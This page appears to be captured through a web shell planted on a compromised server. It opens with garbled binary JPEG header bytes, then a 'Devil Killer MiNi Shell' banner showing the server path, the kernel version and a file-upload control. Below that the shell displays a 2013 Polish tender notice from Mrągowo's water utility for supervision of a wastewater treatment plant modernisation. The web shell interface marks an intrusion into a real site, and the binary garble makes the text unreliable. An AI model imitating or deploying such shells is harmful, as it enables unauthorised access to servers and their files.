JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130215/63034-N-2013.html

<p class="kh_header"><b>Mrągowo: Pełnienie funkcji inspektora nadzoru inwestorskiego na zadaniu Modernizacja oczyszczalni ścieków i systemu kanalizacyjnego dla Miasta  Mrągowo w zakresie wszystkich branż</b><br>
<b>Numer ogłoszenia: 63034 - 2013; data zamieszczenia: 15.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji Sp. z o.o. , Os. Mazurskie 1A, 11-700 Mrągowo, woj. warmińsko-mazurskie, tel. 0-89 742 61 11, faks 0-89 741 86 21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwik.mragowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Sp. zo.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego na zadaniu Modernizacja oczyszczalni ścieków i systemu kanalizacyjnego dla Miasta  Mrągowo w zakresie wszystkich branż.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje pełnienie funkcji inspektora nadzoru inwestorskiego na zadaniu pn. Modernizacja oczyszczalni ścieków i systemu kanalizacyjnego dla Miasta Mrągowo w zakresie wszystkich branż  

1.Przedmiot zamówienia obejmuje swoim zakresem pełnienie funkcji inspektora nadzoru inwestorskiego nad  wykonaniem :

1.1 Rozbudowa budynku socjalno-biurowego na terenie oczyszczalni ścieków w Polskiej Wsi koło Mrągowa o powierzchni użytkowej 121,63 m2; powierzchni zabudowy 163,64m2; kubaturze 755 m3.
Roboty budowlane wchodzące w skład zamówienia (udział procentowy):
- prace rozbiórkowe (16,01 %),
- roboty ziemne (3,45 %),
- ławy i ściany fundamentowe (3,29 %),
- izolacja ścian i ław fundamentowych (3,89 %),
- roboty murowe: parter, poddasze (7,56 %),
- strop żelbetowy, wieńce, rdzenie żelbetowe (3,77 %),
- izolacja stropu (2,76 %),
- kominy wentylacyjne (3,26 %),
- konstrukcja więźby dachowej (2,76 %),
- pokrycie połaci dachowej (8,32 %),
- stolarka okienna i drzwiowa (6,93 %),
- ścianki działowe (1,31 %),
- tynki i okładziny ścian i sufitów (11,02 %),
- podkłady i posadzki (9,74 %),
- roboty malarskie (0,17 %),
- elewacja (11,51 %),
- elementy zewnętrzne (4,24 %).

 1.2 Przebudowa oraz wymiana urządzeń technologicznych oczyszczalni ścieków dla Miasta Mrągowo.

Roboty budowlane wchodzące w skład zamówienia (branże: sanitarna, technologia, budowlana, drogowa, elektryczna, AKPiA):
1. Instalacje elektryczne i sterownicze:


- zasilanie energetyczne oczyszczalni ścieków,
- wymiana istniejącego agregatu prądotwórczego,
- wykonanie nowej rozdzielnicy głównej,
- wykonanie nowego zasilania rozdzielnicy głównej,
- wykonanie szafek obiektowych,
- wymiana kabli zasilających,
- wymiana kabli sterowniczych.
- wymiana układu sterowania urządzeń oczyszczalni,
- zastosowanie trzech stanowisk komputerowych (1 pomieszczenie kierownika oczyszczalni, 2 dyspozytornia, pomieszczenie socjalne obsługi) do sterowania i nadzoru pracy urządzeń oczyszczalni,
- wymiana przepływomierzy, mierników tlenu, temperatury, poziomu, mętności,
2. Główny rurociąg tłoczny ścieków do oczyszczalni:
- spięcie obu rurociągów: DN 500 mm (rurociągu głównego) i DN 400 mm (rurociągu rezerwowego), co zapewni dosył ścieków do oczyszczalni w przypadku wystąpienia awarii na rurociągu głównym,
- wykonanie izolacji termicznej z pokryciem blachą kwasoodporną rurociągów tłocznych:
o DN 400 mm ścieków surowych do budynku krat,
o DN 150 mm ścieków ze składowiska odpadów.
3. Komora rozprężna i kraty mechaniczne:
- demontaż istniejących krat i wymianę dotychczas pracujących krat do separacji ciał stałych na mechaniczne kraty gęste o prześwicie 3 mm,
- instalację do płukania skratek, z prasą, rozdrabniaczem i przenośnikiem ślimakowym, który transportowałby skratki na zewnątrz do kontenera,
4. Piaskownik:
- demontaż istniejącego pomostu i zgarniaczy osadu w piaskowniku i zainstalowanie dwóch zgarniaczy łańcuchowych, 
- wymianę pomp do pompowania pupy piaskowej oraz montaż osadowych rurociągów tłocznych do separatora piasku, 
- wymianę dmuchawy do napowietrzania ścieków w piaskowniku, zainstalowanej w budynku krat,
- instalację do płukania pulpy piaskowej - separator piasku,
- kanał odprowadzający wody popłuczne wraz z częściami organicznymi z separatora piasku.
5. Blok biologicznego oczyszczania ścieków:
- zmianę dotychczasowego układu przepływu ścieków przez poszczególne komory bioreaktora; w projektowanym układzie ścieki przez bioreaktor będą przepływały w kolejności następującej: komora defosfatacji (KDF) - komora denitryfikacji (KDN) - komora	nitryfikacji (KN) - osadnik wtórny biologiczny;
- wymianę mieszadeł w komorach reaktorów (KDF i KDN) - demontaż starych i montaż nowych mieszadeł,
- wymianę instalacji napowietrzania wgłębnego ścieków w komorach nitryfikacji (KN) - demontaż starej instalacji i montaż nowej instalacji,
- wymianę dmuchaw dostarczających powietrze do komór nitryfikacji (KN) na dmuchawy o większej wydajności (demontaż starych dmuchaw i montaż nowych dmuchaw),
- wymianę pomp do recyrkulacji wewnętrznej ścieków z komór KN do komór KDN wraz z wymianą rurociągów tłocznych (demontaż i montaż),
- wymianę rurociągów tłocznych do recyrkulacji zewnętrznej (demontaż i montaż),
- wymianę rurociągów tłocznych do osadu nadmiernego (demontaż i montaż),
- wymianę zgarniaczy osadu w osadnikach biologicznych (demontaż istniejących zgarniaczy na pomostach i montaż zgarniaczy łańcuchowych),
- wymianę instalacji do odprowadzania części flotujących z osadników biologicznych (projektuje się pompownię wspólną dla obu osadników z doprowadzeniem medium i rurociągiem tłocznym).
6. Osadnik końcowy chemiczny:
- wymianę kompletu zgarniacza osadu osadnika radialnego (demontaż starego zgarniacza i montaż projektowanego zgarniacza),



- wymianę istniejących koryt przelewowych i ekranu do zatrzymywania zanieczyszczeń pływających na koryta z przelewami regulowanymi ze stali nierdzewnej (demontaż i montaż), demontaż dotychczasowego koryta 
   najazdowego, mającego za zadanie odbieranie części pływających w osadniku, oraz likwidację dotychczasowego systemu odbierania i przepompowywania części pływających w osadniku,
- wymianę pompy osadowej i pokryw w przepompowni osadu chemicznego oraz wymianę rurociągu tłocznego,
- naprawa toru jezdnego zgarniacza z ubytków betonu.
7. Zagęszczacz osadu i zbiornik homogenizacji osadu:
- zmienić pracę zagęszczacza grawitacyjnego z pracy ciągłej na pracę okresową, cykliczną (cykl pracy zagęszczacza: napełnianie, mieszanie za pomocą systemu napowietrzającego, sedymentacja osadu, dekantacja cieczy nadosadowej, odprowadzenie osadu),
- zainstalowanie pompy zatapialnej do dekantacji cieczy nadosadowej,
- urządzenia do napowietrzania osadu w zagęszczaczu,
- wymianę pomp do zagęszczonego osadu, pompujących osad do zbiornika homogenizacji (demontaż i montaż),
- wykonanie pokryw przepompowni (szt. 3) z blachy nierdzewnej,
- wymiana pompy mieszającej w zbiorniku homogenizacji.
8. Stacja odwadniania osadu:
- wymianę istniejącej taśmowej prasy filtracyjnej do odwadniania osadu w budynku stacji na wirówkę (demontaż i montaż).
- wymianę pompy osadowej doprowadzającej osad na wirówkę (demontaż i montaż).
- wymiana pompy w przepompowni odciekowej z wirówki.
9. Połączenia międzyobiektowe
Wszystkie rurociągi tłoczne podziemne zostaną wykonane z dwuściennych rur ciśnieniowych z polietylenu z dodatkową zewnętrzną, gładką warstwą ochronną odporną na ścieranie oraz zewnętrzne uszkodzenia. Materiał: zewnętrzna warstwa o grubości 3 mm jest wykonana ze spienionego PE-HD (odpornego na UV) w kolorze niebieskim (woda), natomiast wewnętrzna z PE 100+ w kolorze czarnym. Rury powinny posiadać wtopioną wkładkę miedzianą umożliwiającą lokalizację przewodu podczas eksploatacji. Rury przezna?czone są do bezwykopowych oraz wąskowykopowych metod budowy rurociągów, bezpośrednio w naturalnym podłożu gruntowym (bez konieczności wykonywania podsypek i obsypek). Warstwa ochronna zabezpiecza część wewnętrzną rury przed występowaniem 
nieko?rzystnych zjawisk: powolnego wzrostu pęknięcia i gwałtownej propagacji pęknięć. Rury mogą być łączone poprzez złączki zaciskowe do rur PE z polipropylenu PP-B stabilizowanego UV (pierścień z acetalu, uszczelka NBR) bądź łączone przez zgrzewanie. W miarę możli?wości, o ile pozwoli na to projektowana średnica rur, rurociągi budować z rur w zwojach na ciśnienie nominalna PN 10 bar.
Rurociągi ciśnieniowe nadziemne projektuje się z rur stalowych, zaizolowanych termicznie materiałem aerożel, grubości 5 mm . Ocieplenie należy wykonać w dwóch warstwach - mijankowo (2 x 5 mm). Warstwy aerożelu do rur można mocować za pomocą taśmy, drutu lub opaski - zgodnie z instrukcją wydaną przez producenta. Zaizolowane rury należy owinąć blachą stalową nierdzewną o grub. 0,5 mm; połączenia blach wykonać poprzez spa?wanie lub nitowanie.
Przewody grawitacyjne należy wykonać z rur PVC-U, z uszczelkami dwupierścieniowymi trwale mocowanymi w kielichu rury w trakcie procesu produkcyjnego na gorąco typu Sewer Lock (kształtki posiadają uszczelki wargowe), o klasie średniej (4 kN/m2) - w terenie nie obciążonym ruchem transportu kołowego.
W ramach planowanej inwestycji zaprojektowano na terenie oczyszczalni następujące połączenia międzyobiektowe:
- przewody uwodnionych osadów z komór piaskownika do separatora piasku - dwa rurociągi tłoczne DN 65 stal. napowietrzne (nowo-projektowane),
- kanał grawitacyjny PCV 250 odprowadzający wody osadowe i części organicznych z separatora piasku do pompowni odcieków przy stacji mechanicznego odwadniania osadów (nowoprojektowany),
- dwa rurociągi tłoczne recyrkulacji osadu czynnego PE 225 (SDR 17) z pompowni recyrkulacji osadu i osadu nadmiernego do wcinki w rurociągi napowietrzne (wymiana istniejących przewodów),



- dwa rurociągi tłoczne recyrkulacji osadu czynnego DN 200 stal. napowietrzne do bioreaktorów (wymiana istniejących przewodów).
- dwa rurociągi tłoczne osadu nadmiernego PE 160 (SDR 17) do komory rozprężnej przy zagęszczaczu osadu (wymiana istniejących-przewodów),
- dwa kanały grawitacyjne części flotacyjnych PCV 200 z osadników wtórnych biologicznych do pompowni części flotacyjnych (nowo-projektowane),
- rurociąg tłoczny części flotacyjnych PE 90 z pompowni części flotacyjnych przy osadnikach biologicznych do komory rozprężnej przy zagęszczaczu osadu (nowoprojektowany),
- rurociąg tłoczny części flotacyjnych z osadników biologicznych PE 90 - rozgałęzienie do komory rozdziału przed bioreaktorami (nowo-projektowany),
- rurociąg tłoczny osadu chemicznego i części flotacyjnych PE 110 z pompowni osadowej przy osadniku końcowym chemicznym do komory rozprężnej przy zagęszczaczu osadu (wymiana istniejącego przewodu),
- rurociąg tłoczny (napowietrzny) odprowadzający wody osadowe DN 150 stal z zagęszczacza osadu do komory rozdziału przed biore?aktorami (nowoprojektowany),
- kolektory dmuchaw sprężonego powietrza 4 x DN 150 i 2 x DN 300 stal. dosyłające powietrze do komór nitryfikacji bioreaktorów (no?woprojektowane).
Poza wymienionymi przewodami projektuje się przewód doprowadzający wodę do separatora piasku z budynku krat.
10. Pozostałe:
- wykonanie nowych balustrad ze stali nierdzewnej wokół pomostu obsługowego systemu napowietrzającego oraz za?gęszczacza grawitacyjnego, piaskownika, zbiornika homogenizacji, hali krat.
- wykonanie nowych schodów z barierkami ze stali nierdzewnej na obiekty technologiczne oczyszczalni.
- wykonanie barierek ochronnych (łańcuchowych) kwasoodpornych wokół osadnika radialnego i kanału pomiarowego ścieków oczyszczonych.
- przebudowa istniejących odcinków wewnętrznych ciągów komunikacyjnych na terenie oczyszczalni.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.31.80.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości 3 000,00 PLN (słownie złotych: trzy tysiące).
2. Wadium musi być wniesione w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:
a. pieniądzu, przelewem na rachunek bankowy: 87 1160 2202 0000 0000 6193 6648  z dopiskiem Wadium - Pełnienie funkcji inspektora nadzoru inwestorskiego na zadaniu Modernizacja oczyszczalni ścieków i systemu kanalizacyjnego dla Miasta  Mrągowa w zakresie wszystkich branż.
b. poręczeniach bankowych;
c. poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych;
d. gwarancjach bankowych;
e. gwarancjach ubezpieczeniowych;
f. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
3. Wadium wnoszone w formie poręczeń lub gwarancji powinno być załączone w oryginale do oferty i musi obejmować cały okres związania ofertą.
4. Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt. 14.2.a. rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert.
5. Zgodnie z art. 46 ust. 4a i 5 ustawy Pzp Zamawiający zatrzyma wadium wraz z odsetkami, w przypadku gdy:
5.1. Wykonawca, którego oferta zostanie wybrana:
a) odmówi podpisania umowy w sprawie niniejszego zamówienia na warunkach określonych w ofercie;
b) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
c) zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
5.2. Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.

Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.

Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.

Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.
2. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, odpowiedzialnych za świadczenie usługi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 4 ) - spełnieniem tego warunku będzie:
-	inspektor nadzoru ds. ogólnobudowlanych - musi posiadać uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, a także doświadczenie zawodowe na samodzielnym stanowisku sprawowania funkcji technicznych w zakresie robót konstrukcyjno-budowlanych nie mniejsze niż 3 lata,
-	inspektor nadzoru ds. sanitarnych - musi posiadać uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci i instalacji sanitarnych (tj. co najmniej wodociągowych, kanalizacyjnych , wentylacyjnych i cieplnych), a także doświadczenie zawodowe na samodzielnym stanowisku sprawowania funkcji technicznych w zakresie budowy sieci i instalacji sanitarnych nie mniejsze  niż 3 lata,
-	inspektor nadzoru ds. elektrycznych - musi posiadać uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci i instalacji elektrycznych, a także doświadczenie zawodowe na samodzielnym stanowisku sprawowania funkcji technicznych w zakresie budowy sieci i instalacji 
elektrycznych nie mniejsze niż 3 lata

Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.

Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwik.mragowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji Sp. z o.o., os. Mazurskie 1A, 11-700 Mrągowo.</p>
